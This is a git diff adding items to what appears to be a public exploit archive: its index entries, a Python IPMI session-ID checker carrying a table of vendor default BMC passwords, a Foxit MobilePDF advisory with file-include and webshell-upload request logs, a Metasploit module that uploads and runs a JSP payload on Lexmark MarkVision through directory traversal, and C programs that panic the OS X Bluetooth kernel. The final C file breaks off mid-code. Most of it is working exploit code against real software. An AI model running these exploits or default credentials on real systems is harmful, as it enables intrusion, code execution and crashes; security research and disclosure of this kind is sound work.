diff --git a/files.csv b/files.csv index 1f45f62d6..c63582c2d 100755 --- a/files.csv +++ b/files.csv @@ -32220,3 +32220,13 @@ id,file,description,date,author,platform,type,port 35764,platforms/hardware/remote/35764.txt,"Cisco Unified Operations Manager <= 8.5 iptm/eventmon Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 35765,platforms/hardware/remote/35765.txt,"Cisco Unified Operations Manager <= 8.5 iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 35766,platforms/hardware/remote/35766.txt,"Cisco Unified Operations Manager <= 8.5 iptm/logicalTopo.do Multiple Parameter XSS",2011-06-18,"Sense of Security",hardware,remote,0 +35767,platforms/php/webapps/35767.txt,"Gecko CMS 2.3 - Multiple Vulnerabilities",2015-01-13,LiquidWorm,php,webapps,80 +35770,platforms/hardware/webapps/35770.py,"Dell iDRAC IPMI 1.5 - Insufficient Session ID Randomness",2015-01-13,"Yong Chuan, Koh",hardware,webapps,623 +35771,platforms/osx/dos/35771.c,"OS X 10.10 Bluetooth DispatchHCICreateConnection - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0 +35772,platforms/osx/dos/35772.c,"OS X 10.10 Bluetooth BluetoothHCIChangeLocalName - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0 +35773,platforms/osx/dos/35773.c,"OS X 10.10 Bluetooth TransferACLPacketToHW - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0 +35774,platforms/osx/dos/35774.c,"OS X 10.10 Bluetooth DispatchHCIWriteStoredLinkKey - Crash PoC",2015-01-13,"rpaleari and joystick",osx,dos,0 +35775,platforms/ios/webapps/35775.txt,"Foxit MobilePDF 4.4.0 iOS - Multiple Vulnerabilities",2015-01-13,Vulnerability-Lab,ios,webapps,8888 +35776,platforms/java/remote/35776.rb,"Lexmark MarkVision Enterprise Arbitrary File Upload",2015-01-13,metasploit,java,remote,9788 +35777,platforms/windows/remote/35777.rb,"Oracle MySQL for Microsoft Windows FILE Privilege Abuse",2015-01-13,metasploit,windows,remote,0 +35778,platforms/php/remote/35778.rb,"WordPress WP Symposium 14.11 Shell Upload",2015-01-13,metasploit,php,remote,80 diff --git a/platforms/hardware/webapps/35770.py b/platforms/hardware/webapps/35770.py new file mode 100755 index 000000000..246b1908f --- /dev/null +++ b/platforms/hardware/webapps/35770.py @@ -0,0 +1,430 @@ +""" +For testing purposes only. + +(c) Yong Chuan, Koh 2014 +""" + +from time import sleep +from socket import * +from struct import * +from random import * +import sys, os, argparse + +HOST = None +PORT = 623 + +bufsize = 1024 +recv = "" + + +# create socket +UDPsock = socket(AF_INET,SOCK_DGRAM) +UDPsock.settimeout(2) + +data = 21 #offset of data start + +RMCP = ('\x06' + #RMCP.version = ASF RMCP v1.0 + '\x00' + #RMCP.reserved + '\xFF' + #RMCP.seq + '\x07' #RMCP.Type/Class = Normal_RMCP/IPMI + ) + + + +def SessionHeader (ipmi, auth_type='None', seq_num=0, sess_id=0, pwd=None): + auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5} + + sess_header = '' + sess_header += pack(' 0: + chksum = 0x100 - chksum + + return pack('>B', chksum) + + + def Header (self, cmd, seq_num=0x00): + #only for IPMI v1.5 + cmds = {'Get Channel Auth Capabilities' : (0x06, 0x38), #(netfn, cmd_code) + 'Get Session Challenge' : (0x06, 0x39), + 'Activate Session' : (0x06, 0x3a), + 'Set Session Privilege Level' : (0x06, 0x3b), + 'Close Session' : (0x06, 0x3c), + 'Set User Access' : (0x06, 0x43), + 'Get User Access' : (0x06, 0x44), + 'Set User Name' : (0x06, 0x45), + 'Get User Name' : (0x06, 0x46), + 'Set User Password' : (0x06, 0x47), + 'Get Chassis Status' : (0x00, 0x01)} + ipmi_header = '' + ipmi_header += pack('B', self.auth_types[auth_type]) + ipmi += pack('>B', self.priv_lvls[priv_lvl]) + ipmi += authcode #challenge string + ipmi += pack('B', self.priv_lvls[priv_lvl]) + ipmi += self.CheckSum(ipmi[3:]) + + return ipmi + + + def CloseSession (self, hdr_seq, sess_id): + ipmi = '' + ipmi += self.Header ("Close Session", hdr_seq) + ipmi += pack('B', chn_num) #chn_num = 0x0E = current channel + ipmi += pack('>B', user_id) + ipmi += self.CheckSum(ipmi[3:]) + + return ipmi + + + def GetUserName (self, hdr_seq, user_id=2): + ipmi = '' + ipmi += self.Header ("Get User Name", hdr_seq) + ipmi += pack('>B', user_id) + ipmi += self.CheckSum(ipmi[3:]) + + return ipmi + + def SetUserName (self, hdr_seq, user_id, user_name): + #Assign user_name to user_id, replaces if user_id is occupied + ipmi = '' + ipmi += self.Header ("Set User Name", hdr_seq) + ipmi += pack('>B', user_id) + ipmi += user_name.ljust(16, '\x00') + ipmi += self.CheckSum(ipmi[3:]) + + return ipmi + + def SetUserPassword (self, hdr_seq, user_id, password, op='set password'): + ops = {'disable user':0, 'enable user':1, 'set password':2, 'test password':3} + ipmi = '' + ipmi += self.Header ("Set User Password", hdr_seq) + ipmi += pack('>B', user_id) + ipmi += pack('>B', ops[op]) + ipmi += password.ljust(16, '\x00') #IPMI v1.5: 16bytes | IPMI v2.0: 20bytes + ipmi += self.CheckSum(ipmi[3:]) + + return ipmi + + def SetUserAccess (self, hdr_seq, user_id, new_priv, chn=0x0E): + ipmi = '' + ipmi += self.Header ("Set User Access", hdr_seq) + ipmi += pack('B', user_id) + ipmi += pack('>B', self.priv_lvls[new_priv]) + ipmi += pack('>B', 0) + ipmi += self.CheckSum(ipmi[3:]) + + return ipmi + + +def SendUDP (pkt): + + global HOST, PORT, data + + res = '' + code = ipmi_seq = 0xFFFF + for i in range(5): + try: + UDPsock.sendto(pkt, (HOST, PORT)) + res = UDPsock.recv(bufsize) + except Exception as e: + print '[-] Socket Timeout: Try %d'%i + sleep (0) + else: + #have received a reply + if res[4:5] == '\x02': #Session->AuthType = MD5 + data += 16 + code = unpack('B',res[data-1:data])[0] + ipmi_seq= unpack('B',res[data-3:data-2])[0]>>2 + if res[4:5] == '\x02': + data -= 16 + break + return code, ipmi_seq, res + + +def SetUpSession (username, pwd, priv='Admin', auth='MD5'): + + global data + + #Get Channel Authentication Capabilities + ipmi = CreateIPMI().GetChannelAuthenticationCapabilities(0, chn=0xE, priv_lvl=priv) + code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi) + if code != 0x00: + return code, 0, 0, 0 + #print '[+]%-30s: %02X (%d)'%('Get Chn Auth Capabilities', code, ipmi_seq) + + + #Get Session Challenge + ipmi = CreateIPMI().GetSessionChallenge(1, username, 'MD5') + code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi) + if code != 0x00: + if code == 0xFFFF: + print "[-] BMC didn't respond to IPMI v1.5 session setup" + print " If firmware had disabled it, then BMC is not vulnerable" + return code, 0, 0, 0 + temp_sess_id = unpack('" + ipmi = CreateIPMI().GetChassisStatus(31) + code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi) + print '[+] %-35s: %02X (%d)'%('CheckSessionAlive->GetChassisStatus', code, ipmi_seq) + sess_seq += 1 + + return sess_seq + + + + + +def banner(): + print ("######################################################\n"+\ + "## This tool checks whether a BMC machine is vulnerable to CVE-2014-8272\n"+\ + "## (http://www.kb.cert.org/vuls/id/843044)\n"+\ + "## by logging the TemporarySessionID/SessionID in each IPMI v1.5 session,\n"+\ + "## and checking that these values are incremental\n"+\ + "## \n"+\ + "## Author: Yong Chuan, Koh\n"+\ + "## Email: yongchuan.koh@mwrinfosecurity.com\n"+\ + "## (c) Yong Chuan, Koh 2014\n"+\ + "######################################################\n") + + +def main(): + + banner() + + #default usernames/passwords (https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi) + vendors = {"HP" :{"user":"Administrator", "pwd":""}, #no default pwd: + "DELL" :{"user":"root", "pwd":"calvin"}, + "IBM" :{"user":"USERID", "pwd":"PASSW0RD"}, + "FUJITSU" :{"user":"admin", "pwd":"admin"}, + "SUPERMICRO" :{"user":"ADMIN", "pwd":"ADMIN"}, + "ORACLE" :{"user":"root", "pwd":"changeme"}, + "ASUS" :{"user":"admin", "pwd":"admin"} + } + + arg = argparse.ArgumentParser(description="Test for CVE-2014-8272: Use of Insufficiently Random Values") + arg.add_argument("-i", "--ip", required=True, help="IP address of BMC server") + arg.add_argument("-u", "--udpport", nargs="?", default=623, type=int, help="Port of BMC server (optional: default 623)") + arg.add_argument("-v", "--vendor", nargs="?", help="Server vendor of BMC (optional: for default BMC credentials)") + arg.add_argument("-n", "--username", nargs="?", default=None, help="Username of BMC account (optional: for non-default credentials)") + arg.add_argument("-p", "--password", nargs="?", default=None, help="Password of BMC account (optional: for non-default credentials)") + + args = arg.parse_args() + + if args.vendor is not None: args.vendor = args.vendor.upper() + if (args.vendor is None or args.vendor not in vendors.keys()) and (args.username is None or args.password is None): + print "[-] Error: -n and -p are required because -v is not specified/in default list" + print " Vendors with Default Accounts" + print " -----------------------------------" + for vendor,acct in vendors.iteritems(): + print " %s: username='%s', password='%s'"%(vendor,acct["user"],acct["pwd"]) + sys.exit(1) + + if args.username is None: args.username = vendors[args.vendor]["user"].ljust(16, '\x00') + if args.password is None: args.password = vendors[args.vendor]["pwd"].ljust(16, '\x00') + + + global HOST, PORT + HOST = args.ip + PORT = args.udpport + + print "Script Parameters" + print "-------------------------" + print "IP : %s"%HOST + print "Port : %d"%PORT + print "Username : %s"%args.username + print "Password : %s"%args.password + + session_ids = [] + for i in xrange(0x80): #do not go beyond 0xFF, because of how session_ids is checked for incremental later + try: + code, temp_sess_id, sess_seq, sess_id = SetUpSession (args.username, args.password, priv='Admin', auth='MD5') + if code == 0: + session_ids.append(temp_sess_id) + session_ids.append(sess_id) + print '[+%04X] temp_sess_id=%08X, sess_id=%08X'%(i, temp_sess_id, sess_id) + else: + #print '[-%04X] SetUp Session: Trying again after timeout 5s'%(i) + sleep(5) + continue + + + code = CloseSession (sess_seq, sess_id) + if code == 0: + #print '[+%04X] Close Session OK'%(i) + i += 1 + sleep (0.5) + else: + #print '[-%04X] Close Session fail: Wait for natural timeout (60+/-3s)'%(i) + sleep(65) + + except Exception as e: + exc_type, exc_obj, exc_tb = sys.exc_info() + fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1] + print (exc_type, fname, exc_tb.tb_lineno) + + + session_ids = session_ids[:0xFF] + + #get the first incremental diff + const_diff = None + for i in xrange(1, len(session_ids)): + if session_ids[i-1] < session_ids[i]: + const_diff = session_ids[i] - session_ids[i-1] + break + #check if session_ids are increasing at a fixed value + vulnerable = True + crossed_value_boundary = 0 + for i in xrange(1, len(session_ids)): + + if session_ids[i]-session_ids[i-1] != const_diff: + if crossed_value_boundary < 2: + crossed_value_boundary += 1 + else: + vulnerable = False + + if vulnerable: + print "Conclusion: BMC is vulnerable to CVE-2014-8272" + else: + print "Conclusion: BMC is not vulnerable to CVE-2014-8272" + + + + + + +if __name__ == "__main__": + main() + + diff --git a/platforms/ios/webapps/35775.txt b/platforms/ios/webapps/35775.txt new file mode 100755 index 000000000..d48891f4b --- /dev/null +++ b/platforms/ios/webapps/35775.txt @@ -0,0 +1,274 @@ +Document Title: +=============== +Foxit MobilePDF v4.4.0 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1400 + + +Release Date: +============= +2015-01-12 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1400 + + +Common Vulnerability Scoring System: +==================================== +6.9 + + +Product & Service Introduction: +=============================== +Foxit MobilePDF enables you to view and annotate PDF documents on the go, allowing you to work on your PDF documents anytime, anywhere. +Specify the permissions to restrict operations to PDF files, such as copying content, adding annotation, managing page & bookmark, and printing. +Share, store and synchronize PDF files. + +(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/foxit-mobile-pdf/id507040546 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2015-01-12: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Foxit Corporation +Product: MobilePDF - iOS Web Application (Wifi) 4.4.0 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +1.1 +A local file include web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. +The local file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific +path commands to compromise the mobile web-application. + +The vulnerability is located in the `filename` value of the wifi interface `upload` module. Local attackers are able to manipulate the +wifi web interface by usage of the vulnerable `upload` POST method request. The service does not encode or parse the `filename` context +on uploads. Attackers can include an existing local application path or an existing local device path as source in connection with script +code to compromise the iOS app. The execution of unauthorized local file or path request occurs in the index of documents module of the +wifi file service application after the inject. The request method to inject is POST and the attack vector is located on the application-side +of the affected iOS application. + +The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. +Exploitation of the local file include web vulnerability in the upload module requires no user interaction or privileged web-application user account. +Successful exploitation of the local file include web vulnerability results in mobile application compromise or compromised device components. + +Vulnerable Method(s): + [+] POST + +Vulnerable Module(s): + [+] Upload + +Vulnerable Parameter(s): + [+] filename (name) + +Affected Module(s): + [+] Index of Documents (http://localhost:8888) + + + +1.2 +An arbitrary file upload web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application. +The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the system validation and compromise the web-server. + +The vulnerability is located in the filename value of the `upload` file module. Remote attackers are able to upload a php or js web-shell by a rename of the +filename with multiple extensions in the upload POST method request. The attacker uploads for example a web-shell with the following name and extension +`pentest.png.html.php.js.aspx.png`. After the upload the attacker needs to open the file in the wifi web-application interface. He deletes the .png file +extension and can access the webshell with elevated access rights to execute. + +The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6. +Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password. +Successful exploitation of the arbitrary file upload vulnerability results in unauthorized file access (aap/device) and compromise of http web-server. + + +Request Method(s): + [+] [POST] + +Vulnerable Module(s): + [+] Upload + +Vulnerable Parameter(s): + [+] filename (multiple extensions) + +Affected Module(s): + [+] Index of Documents (http://localhost:8888) + + +Proof of Concept (PoC): +======================= +1.1 +The local file include vulnerability can be exploited by remote attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +Manual steps to reproduce the vulnerability ... +1. Download and install the FoxIT MobilePDF iOS application +2. Surf to the Documents Index of the Wifi Server (http://localhost:8888) +3. Start to choose a file for the upload function by usage of the search +4. Intercept the session by usage of a tamper and change the name value to the local device path source +5. Continue the request and save the settings. After that go back to the Index of Documents +Note: The execution of the script code occurs in the vulnerable name value of the index file dir list +6. Successful reproduce of the security vulnerability! + +PoC: Index of Documents (Name) +file +2015-01-10 13:49538 B + +--- PoC Session Logs [POST] (File Include > Upload)--- +Status: 200[OK] +POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3624] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8888] + User-Agent +[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8888/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------3796507625132 +Content-Disposition: form-data; name="button"; +filename="./[LOCAL FILE INCLUDE VULNERABILITY!]+2.png" +Content-Type: image/png + +--- PoC Session Logs [GET] (File Dir Index List)--- +13:54:26.427[48ms][total 48ms] Status: 200[OK] +GET http://localhost:8888/%3C/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_NORMAL] Größe des Inhalts[142] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8888] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] + Accept[image/png,image/*;q=0.8,*/*;q=0.5] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8888/] + Connection[keep-alive] + Response Header: + Accept-Ranges[bytes] + Content-Length[142] + Date[Sa., 10 Jan. 2015 12:49:30 GMT] + +Reference(s): +http://localhost:8888/ +http://localhost:8888/%3C/./ + + + +1.2 +The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account or user interaction. +For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. + +PoC: URL +http://localhost:8888/./webshell.png.html.php + +PoC: Index of Documents +webshell.png.html.php.js.png +file2015-01-10 13:58 +538 B + +--- PoC Session Logs [POST] --- +14:03:16.481[149ms][total 1583ms] Status: 200[OK] +POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3883] Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:8888] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0] + Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:8888/] + Connection[keep-alive] + POST-Daten: + POST_DATA[-----------------------------282243582256 +Content-Disposition: form-data; name="button"; filename="webshell.png.html.php.js.png" +Content-Type: image/png + +Reference(s): +http://localhost:8888/ +http://localhost:8888/./webshell.png.html.php + + +Solution - Fix & Patch: +======================= +1.1 +The file include vulnerability can be paütched by a secure parse and encode of the vulnerable `filename` value in the upload POST method request. +Restrict the filename input and filter with an own set exception to prevent application-side attacks. +Parse also in the Index of Documents the vulnerable name output value to solve the issue. + +1.2 +Restrict the vulnerable `filename` value and implement a secure filter mechanism with own exception to prevent the upload of files with multiple extensions. +Restrict the upload folder and disallow the execution of files that are already uploaded. + + +Security Risk: +============== +1.1 +The security risk of the local file include web vulnerability in the upload POSt method request is estimated as high. (CVSS 6.9) + +1.2 +The security risk of the arbitrary file upload vulnerability in the upload POST method request is estimated as high. (CVSS 6.6) + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed +or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable +in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab +or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for +consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, +policies, deface websites, hack into databases or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to +electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by +Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website +is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact +(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM +SERVICE: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com +PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt + + diff --git a/platforms/java/remote/35776.rb b/platforms/java/remote/35776.rb new file mode 100755 index 000000000..fa807db5e --- /dev/null +++ b/platforms/java/remote/35776.rb @@ -0,0 +1,155 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FileDropper + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Lexmark MarkVision Enterprise Arbitrary File Upload', + 'Description' => %q{ + This module exploits a code execution flaw in Lexmark MarkVision Enterprise before 2.1. + A directory traversal in the GfdFileUploadServlet servlet allows an unauthenticated + attacker to upload arbitrary files, including arbitrary JSP code. This module has been + tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2. + }, + 'Author' => + [ + 'Andrea Micalizzi', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-8741'], + ['ZDI', '14-410'], + ['URL', 'http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US'] + ], + 'Privileged' => true, + 'Platform' => 'win', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'Lexmark Markvision Enterprise 2.0', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Dec 09 2014')) + + register_options( + [ + Opt::RPORT(9788), + OptString.new('TARGETURI', [true, 'ROOT path', '/']) + ], self.class) + end + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, 'mve', 'help', 'en', 'inventory', 'am_about.html') + }) + + version = nil + if res && res.code == 200 && res.body && res.body.to_s =~ /MarkVision Enterprise ([\d\.]+)/ + version = $1 + else + return Exploit::CheckCode::Unknown + end + + if Gem::Version.new(version) <= Gem::Version.new('2.0.0') + return Exploit::CheckCode::Appears + end + + Exploit::CheckCode::Safe + end + + def exploit + jsp_leak = jsp_path + jsp_name_leak = "#{rand_text_alphanumeric(4 + rand(32 - 4))}.jsp" + # By default files uploaded to C:\Program Files\Lexmark\Markvision Enterprise\apps\library\gfd-scheduled + # Default app folder on C:\Program Files\Lexmark\Markvision Enterprise\tomcat\webappps\ROOT + traversal_leak = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_name_leak}\x00.pdf" + + print_status("#{peer} - Uploading info leak JSP #{jsp_name_leak}...") + if upload_file(traversal_leak, jsp_leak) + print_good("#{peer} - JSP successfully uploaded") + else + fail_with(Failure::Unknown, "#{peer} - JSP upload failed") + end + + res = execute(jsp_name_leak) + + if res && res.code == 200 && res.body.to_s !~ /null/ && res.body.to_s =~ /Path:(.*)/ + upload_path = $1 + print_good("#{peer} - Working directory found in #{upload_path}") + register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_name_leak)) + else + print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required") + end + + jsp_payload_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" + jsp_payload = payload.encoded + traversal_payload = "/..\\..\\..\\tomcat\\webapps\\ROOT\\#{jsp_payload_name}\x00.pdf" + + print_status("#{peer} - Uploading JSP payload #{jsp_payload_name}...") + if upload_file(traversal_payload, jsp_payload) + print_good("#{peer} - JSP successfully uploaded") + register_file_for_cleanup(::File.join(upload_path, 'webapps', 'ROOT', jsp_payload_name)) if upload_path + else + fail_with(Failure::Unknown, "#{peer} - JSP upload failed") + end + + print_status("#{peer} - Executing payload...") + execute(jsp_payload_name, 3) + end + + def upload_file(filename, contents) + good_signature = rand_text_alpha(4 + rand(4)) + bad_signature = rand_text_alpha(4 + rand(4)) + + post_data = Rex::MIME::Message.new + post_data.add_part(good_signature, nil, nil, 'form-data; name="success"') + post_data.add_part(bad_signature, nil, nil, 'form-data; name="failure"') + post_data.add_part(contents, 'application/octet-stream', nil, "form-data; name=\"datafile\"; filename=\"#{filename}\"") + + res = send_request_cgi( + { + 'uri' => normalize_uri(target_uri.path, 'mve', 'upload', 'gfd'), + 'method' => 'POST', + 'data' => post_data.to_s, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + + if res && res.code == 200 && res.body && res.body.to_s.include?(good_signature) + return true + else + return false + end + end + + def execute(jsp_name, time_out = 20) + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, jsp_name), + 'method' => 'GET' + }, time_out) + + res + end + + def jsp_path + jsp =<<-EOS +<%@ page language="Java" import="java.util.*"%> +<% +out.println("Path:" + System.getProperty("catalina.home")); +%> + EOS + + jsp + end + +end \ No newline at end of file diff --git a/platforms/osx/dos/35771.c b/platforms/osx/dos/35771.c new file mode 100755 index 000000000..33c1e8cea --- /dev/null +++ b/platforms/osx/dos/35771.c @@ -0,0 +1,74 @@ +/* + * crash-issue1.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick. + * + * Exploits a missing check in + * IOBluetoothHCIUserClient::DispatchHCICreateConnection() causing a panic. + * + * gcc -Wall -o crash-issue1{,.c} -framework IOKit + */ + +#include +#include +#include +#include +#include + +#include + +#define SIZE 0x1000 + +struct BluetoothCall { + uint64_t args[7]; + uint64_t sizes[7]; + uint64_t index; +}; + +int main(void) { + /* Finding vuln service */ + io_service_t service = + IOServiceGetMatchingService(kIOMasterPortDefault, + IOServiceMatching("IOBluetoothHCIController")); + + if (!service) { + return -1; + } + + /* Connect to vuln service */ + io_connect_t port = (io_connect_t) 0; + kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); + IOObjectRelease(service); + if (kr != kIOReturnSuccess) { + return kr; + } + + printf(" [+] Opened connection to service on port: %d\n", port); + + struct BluetoothCall a; + int i; + + for (i=0; i<7; i++) { + a.args[i] = (uint64_t) calloc(SIZE, sizeof(char)); + a.sizes[i] = SIZE; + } + + /* This value causes IOMalloc() to fail */ + a.args[6] = 0x0; + a.sizes[6] = 0x80000041; + a.index = 0x06; /* DispatchHCICreateConnection() */ + + for(i = 0; i < 120; i++) { + if(i % 8 == 0) printf("\n"); + printf("\\x%02x", ((unsigned char *)&a)[i]); + } + printf("\n"); + + kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ + (uint32_t) 0, /* Selector */ + NULL, 0, /* input, inputCnt */ + (const void*) &a, /* inputStruct */ + 120, /* inputStructCnt */ + NULL, NULL, NULL, NULL); /* Output stuff */ + printf("kr: %08x\n", kr); + + return IOServiceClose(port); +} diff --git a/platforms/osx/dos/35772.c b/platforms/osx/dos/35772.c new file mode 100755 index 000000000..fe5df7982 --- /dev/null +++ b/platforms/osx/dos/35772.c @@ -0,0 +1,74 @@ +/* + * crash-issue2.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick. + * + * Triggers a panic overwriting a stack_canary. + * + * gcc -Wall -o crash-issue2{,.c} -framework IOKit + * + */ + +#include +#include +#include +#include +#include + +#include + +struct BluetoothCall { + uint64_t args[7]; + uint64_t sizes[7]; + uint64_t index; +}; + +int main(void) { + /* Finding vuln service */ + io_service_t service = + IOServiceGetMatchingService(kIOMasterPortDefault, + IOServiceMatching("IOBluetoothHCIController")); + + if (!service) { + return -1; + } + + /* Connect to vuln service */ + io_connect_t port = (io_connect_t) 0; + kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port); + IOObjectRelease(service); + if (kr != kIOReturnSuccess) { + return kr; + } + + printf(" [+] Opened connection to service on port: %d\n", port); + + struct BluetoothCall a; + + a.sizes[0] = 0x1000; + a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char)); + + /* This arguments overflows a local buffer and the adjacent stack canary */ + a.sizes[1] = 264; + a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char)); + memset((void *)a.args[1], 'A', a.sizes[1]); + + /* Call IOBluetoothHCIUserClient::DispatchHCIReadLocalName() */ + a.index = 0x2d; + + /* Debug */ + for(int i = 0; i < 120; i++) { + if(i % 8 == 0) printf("\n"); + printf("\\x%02x", ((unsigned char *)&a)[i]); + } + printf("\n"); + fflush(stdout); + + kr = IOConnectCallMethod((mach_port_t) port, /* Connection */ + (uint32_t) 0, /* Selector */ + NULL, 0, /* input, inputCnt */ + (const void*) &a, /* inputStruct */ + sizeof(a), /* inputStructCnt */ + NULL, NULL, NULL, NULL); /* Output stuff */ + printf("kr: %08x\n", kr); + + return IOServiceClose(port); +} diff --git a/platforms/osx/dos/35773.c b/platforms/osx/dos/35773.c new file mode 100755 index 000000000..86071f68c --- /dev/null +++ b/platforms/osx/dos/35773.c @@ -0,0 +1,77 @@ +/* + * crash-issue3.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick. + * + * Exploits a missing check in + * IOBluetoothHCIController::TransferACLPacketToHW() to trigger a panic. + * + * gcc -Wall -o crash-issue3{,.c} -framework IOKit + * + */ + +#include +#include +#include +#include +#include + +#include + +struct BluetoothCall { + uint64_t args[7]; + uint64_t sizes[7]; + uint64_t index; +}; + +int main(void) { + /* Finding vuln service */ + io_service_t service = + IOServiceGetMatchingService(kIOMasterPortDefault, + IOServiceMatching("IOBluetoothHCIController")); + + if (!service) { + return -1; + } 